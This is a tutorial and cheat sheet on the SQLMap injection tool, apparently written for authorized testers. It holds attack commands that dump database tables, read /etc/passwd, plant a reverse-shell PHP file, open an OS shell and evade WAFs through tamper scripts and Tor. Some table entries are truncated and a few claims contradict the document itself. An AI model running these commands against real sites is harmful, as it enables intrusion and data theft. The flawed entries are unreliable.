Learn how the SQLMap tool works and its significance in SQL injection testing and exploitation. Understand its capabilities, and techniques, and used them to enhance web application security through an automated vulnerability assessment.
What is SQLMAP?
In the realm of web application security, SQL injection remains a prevalent and severe vulnerability. As the sophistication of cyberattacks increases, it becomes crucial to identify and patch such vulnerabilities before malicious actors exploit them. This is where the SQLMap tool comes into play. SQLMap is a powerful open-source tool that automates the process of detecting and exploiting SQL injection vulnerabilities. In this article, we will delve into the inner workings of SQLMap, its techniques, and how it aids in ensuring robust web application security.
Understanding SQL Injection
Before diving into SQLMap, let’s briefly explore SQL injection. It is a technique used by attackers to manipulate SQL queries executed by a web application’s database backend.
By inserting malicious SQL code, attackers can bypass authentication mechanisms, extract sensitive data, modify databases, or even execute arbitrary commands on the underlying server.
To combat this threat, developers and security professionals perform SQL injection testing to identify and rectify potential vulnerabilities.
SQLMAP is packed with features that make it a powerful tool for testing web application security. Some of its notable features include:
- Automatic detection of SQL Injection vulnerabilities: SQLMAP uses various techniques to automatically detect SQL Injection vulnerabilities in web applications, such as error-based, blind, time-based, and boolean-based techniques.
- Advanced exploitation techniques: SQLMAP provides advanced exploitation techniques, such as privilege escalation, database fingerprinting, and password cracking, to gain unauthorized access to the database.
- Support for multiple databases: SQLMAP supports a wide range of databases, making it a versatile tool for testing different types of web applications.
- Customizable testing options: SQLMAP allows testers to customize various testing options, such as the level of tests, delay between requests, and the type of injection technique to use.
- Detailed reporting: SQLMAP generates detailed reports that provide information about the vulnerabilities discovered, the exploited data, and the overall testing results, making it easy to analyze the findings.
Now, let’s dive into some practical examples of using SQLMAP with various commands.
B: Boolean-based blind
U: Union query-based
S: Stacked queries
T: Time-based blind
Q: Inline queries
|Boolean-based||Exploits SQL injection vulnerabilities by sending queries that evaluate to either true or false to extract information.|
|Time-based||Delays the SQL query execution to determine if the injection is successful, often used when direct retrieval is not possible.|
|Error-based||Relies on error messages returned by the database to extract information about the underlying database structure and data.|
|UNION-based||Constructs UNION queries to combine result sets from multiple SELECT statements to extract information from the database.|
|Stacked queries||Executes multiple queries within a single SQL statement to perform actions beyond the scope of a single query.|
|Out-of-band||Utilizes features of the database or network to extract data, such as making DNS or HTTP requests to transmit information.|
|Time-based blind||Similar to time-based technique, but doesn’t rely on explicit responses from the database, using delays for inference instead.|
|Boolean-based blind||Similar to boolean-based technique, but doesn’t rely on explicit responses from the database, using true/false conditions.|
|Error-based blind||Similar to error-based technique, but doesn’t rely on explicit error messages, using conditional statements for inference.|
|UNION-based blind||Similar to UNION-based technique, but doesn’t rely on explicit result sets, using UNION/SELECT statements for inference.|
Basic SQL Injection test:
sqlmap -u https://example.com/login.php?username=test&password=test
This command tells SQLMAP to target the URL “https://example.com/login.php” with the parameters “username” and “password” and use the default technique to test for SQL Injection vulnerabilities.
Custom injection technique
sqlmap -u https://example.com/login.php?username=test&password=test --technique=U
This command specifies the “U” technique, which represents Union-based SQL Injection, to test for vulnerabilities in the “username” and “password” parameters of the URL.
Custom testing level and risk
sqlmap -u https://example.com/login.php?username=test&password=test --level=3 --risk=2
This command sets the testing level to 3 and the risk level to 2, which increases the thoroughness of the tests and the aggressiveness of the attacks.
Fetching database information
sqlmap -u https://example.com/login.php?username=test&password=test -D dbname --tables
This command tells SQLMAP to fetch the list of tables in the “dbname” database of the target URL.
Dumping data from a specific table
sqlmap -u https://example.com/login.php?username=test&password=test -D dbname -T tablename --dump
This command instructs SQLMAP to dump the data from the “tablename” table in the “dbname” database of the target URL.
Using a custom cookie
sqlmap -u https://example.com/login.php -C "PHPSESSID=1234567890abcdef
This command uses a custom cookie “PHPSESSID=1234567890abcdef” to authenticate with the target URL “https://example.com/login.php” and perform SQL Injection tests.
Using a custom User-Agent
sqlmap -u https://example.com/login.php --headers="User-Agent: customAgent"
This command sets a custom User-Agent “customAgent” in the request headers while testing for SQL Injection vulnerabilities in the target URL.
Saving the results to a report file
sqlmap -u https://example.com/login.php --batch --output-file=result.txt
This command runs SQLMAP in batch mode, saves the results to a report file “result.txt”, and suppresses interactive prompts.
Using a proxy
sqlmap -u https://example.com/login.php --proxy=http://proxy.example.com:8080
This command configures SQLMAP to use a proxy “http://proxy.example.com:8080” for sending requests to the target URL.
Using a custom tamper script
sqlmap -u https://example.com/login.php --tamper=my_script.py
List of some commonly used SQLMap TAMPER scripts, along with their descriptions and parameters:
|apostrophemask||Adds a random number of apostrophes to the payload to evade input filters.|
|apostrophenullencode||Encodes apostrophes as their equivalent null byte representation to bypass certain filters.|
|appendnullbyte||Appends a null byte (|
|base64encode||Encodes payloads using Base64 to bypass filters that block specific characters.|
|between||Converts comparison operators (e.g., |
|bluecoat||Applies a transformation that evades BlueCoat’s filtering system.|
|chardoubleencode||Encodes each character twice to bypass security filters that detect single encoding.|
|charunicodeencode||Encodes each character using Unicode hexadecimal representation to evade filters.|
|equaltolike||Replaces equal operators (|
|gtlike||Modifies comparison operators to use |
|halfversionedmorekeywords||Adds random SQL keywords to the payload to bypass security filters.|
|modsecurityversioned||Bypasses ModSecurity filters by adding comments and version-specific payload alterations.|
|multiplespaces||Adds multiple spaces between keywords and identifiers to bypass certain filters.|
|nonrecursivereplacement||Modifies payloads using a non-recursive technique to evade security filters.|
These tamper scripts can be used with the
--tamper=<tamper_script> parameter in SQLMap to apply specific tampering techniques during the scanning process. Each script modifies the payloads generated by SQLMap to bypass various input filters, evade WAF rules, and increase the chances of successful SQL injection exploitation.
SqlMap – target options
Target: At least one of these options has to be provided to define the target(s) -u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1") -d DIRECT Connection string for direct database connection -l LOGFILE Parse target(s) from Burp or WebScarab proxy log file -m BULKFILE Scan multiple targets given in a textual file -r REQUESTFILE Load HTTP request from a file -g GOOGLEDORK Process Google dork results as target URLs -c CONFIGFILE Load options from a configuration INI file
sqlmap -r req.txt -p namePeople
--current-user Retrieve DBMS current user --current-db Retrieve DBMS current database --hostname Retrieve DBMS server hostname --is-dba Detect if the DBMS current user is DBA --users Enumerate DBMS users --passwords Enumerate DBMS users password hashes --privileges Enumerate DBMS users privileges
sqlmap -r req.txt -p namePeople --all
sqlmap -r req.txt -p namePeople --banner
sqlmap -r req.txt -p namePeople --dbs
sqlmap -r req.txt -p namePeople --current-user
sqlmap -r req.txt -p namePeople --roles
sqlmap -r req.txt -p namePeople --users
sqlmap -r req.txt -p namePeople --hostname
sqlmap -r req.txt -p namePeople --privileges
File system access
These options can be used to access the back-end database management system underlying file system --file-read=FILE.. Read a file from the back-end DBMS file system --file-write=FIL.. Write a local file on the back-end DBMS file system --file-dest=FILE.. Back-end DBMS absolute filepath to write to
sqlmap -r req.txt -p namePeople <strong>--file-read</strong>=/etc/passwd --batch
sqlmap -r req.txt -p namePeople --file-write=/home/user/rshell.php --file-dest=/var/www/html --batch
Operating system access
These options can be used to access the back-end database management system underlying operating system --os-cmd=OSCMD Execute an operating system command --os-shell Prompt for an interactive operating system shell --os-pwn Prompt for an OOB shell, Meterpreter or VNC --os-smbrelay One click prompt for an OOB shell, Meterpreter or VNC --os-bof Stored procedure buffer overflow exploitation --priv-esc Database process user privilege escalation --msf-path=MSFPATH Local path where Metasploit Framework is installed --tmp-path=TMPPATH Remote absolute path of temporary files directory
sqlmap -r req.txt -p namePeople --os-cmd=ifconfig sqlmap -r req.txt -p namePeople --os-shell
Windows Registry Access
These options can be used to access the back-end database management system Windows registry --reg-read Read a Windows registry key value --reg-add Write a Windows registry key value data --reg-del Delete a Windows registry key value --reg-key=REGKEY Windows registry key --reg-value=REGVAL Windows registry key value --reg-data=REGDATA Windows registry key value data --reg-type=REGTYPE Windows registry key value type
--proxy=PROXY Use a proxy to connect to the target URL --proxy-cred=PRO.. Proxy authentication credentials (name:password) --proxy-file=PRO.. Load proxy list from a file --proxy-freq=PRO.. Requests between change of proxy from a given list --tor Use Tor anonymity network --tor-port=TORPORT Set Tor proxy port other than default --tor-type=TORTYPE Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default)) --check-tor Check to see if Tor is used properly
sqlmap --proxy="http://<proxy-ip>:<proxy-port>" sqlmap --proxy="http://<proxy-ip>:<proxy-port>" --proxy-cred=username:password sqlmap --tor --tor-port=9050 --tor-type=SOCKS5 -r req.txt --dbs sqlmap --check-tor sqlmap -r req.txt -p namePeople
SQLMap firewall filters
Here’s a table that lists some commonly used SQLMap firewall filters, along with their descriptions and parameters:
|Random Agent||Utilizes random User-Agent strings to bypass web application firewalls that employ user-agent filtering.|
|Random URI||Generates random URIs to evade web application firewalls that rely on specific URI patterns for filtering.|
|Random Parameter||Randomizes parameter names to bypass web application firewalls that depend on specific parameter naming schemes.|
|TAMPER script||Uses custom tampering scripts to modify requests and evade web application firewalls that detect known patterns.|
|Ignore WAF||Ignores and bypasses Web Application Firewalls (WAFs) during the scanning process.|
|HTTP Method||Modifies the HTTP request method (e.g., from GET to POST) to bypass firewalls that block specific methods.|
|URI Encoding||Encodes special characters in the URI to bypass firewalls that block or interpret them as malicious.|
|Delayed Requests||Introduces delays between requests to bypass time-based firewalls that block requests within a specific time.|
|Cookie Filtering||Manipulates cookies or session values to evade firewalls that filter based on specific cookie contents.|
|Host Header||Modifies the Host header to bypass firewalls that rely on specific host values for filtering.|
These firewall filters and parameters help SQLMap evade different types of web application firewalls and bypass their security measures.
It’s important to note that the usage of these filters should always adhere to ethical guidelines and be within the context of authorized security assessments.
|0eunion||Replaces instances of UNION with e0UNION|
|base64encode||Base64-encodes all characters in a given payload|
|between||Replaces greater than operator (|
|commalesslimit||Replaces (MySQL) instances like |
|equaltolike||Replaces all occurrences of operator equal (|
|halfversionedmorekeywords||Adds (MySQL) versioned comment before each keyword|
|modsecurityversioned||Embraces complete query with (MySQL) versioned comment|
|modsecurityzeroversioned||Embraces complete query with (MySQL) zero-versioned comment|
|percentage||Adds a percentage sign (|
|plus2concat||Replaces plus operator (|
|randomcase||Replaces each keyword character with random case value (e.g. SELECT -> SEleCt)|
|space2comment||Replaces space character (|
|space2dash||Replaces space character (|
|space2hash||Replaces (MySQL) instances of space character (|
|space2mssqlblank||Replaces (MsSQL) instances of space character (|
|space2plus||Replaces space character (|
|space2randomblank||Replaces space character (|
|symboliclogical||Replaces AND and OR logical operators with their symbolic counterparts (|
|versionedkeywords||Encloses each non-function keyword with (MySQL) versioned comment|
|versionedmorekeywords||Encloses each keyword with (MySQL) versioned comment|
By using these commands and customizing SQLMAP settings, you can detect and exploit SQL injection vulnerabilities in web applications.
Remember, always use penetration testing tools ethically and with permission, and never use them to harm or exploit others.
What is SQLMAP?
SQLMAP is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities in web applications.
What is SQL injection?
SQL injection is a type of web application security vulnerability that allows an attacker to inject malicious SQL code into a web application, potentially gaining access to sensitive data or executing unauthorized actions.
How does SQLMAP work?
SQLMAP works by analyzing web application requests and responses to automatically detect and exploit SQL injection vulnerabilities.
Is SQLMAP legal to use?
Yes, SQLMAP is legal to use for penetration testing purposes as long as you have obtained permission from the owner of the web application you are testing.
Can SQLMAP detect all types of SQL injection vulnerabilities?
No, SQLMAP cannot detect all types of SQL injection vulnerabilities. However, it is a powerful tool that can detect and exploit many common types of SQL injection vulnerabilities.
Can SQLMAP be used to test non-web applications?
No, SQLMAP is designed specifically for testing SQL injection vulnerabilities in web applications.
Are there any alternatives to SQLMAP?
Yes, there are several other SQL injection testing tools available, including Havij, Acunetix, and Burp Suite.
Can SQLMAP be used on any operating system?
Yes, SQLMAP is a cross-platform tool that can be used on Windows, Linux, and macOS.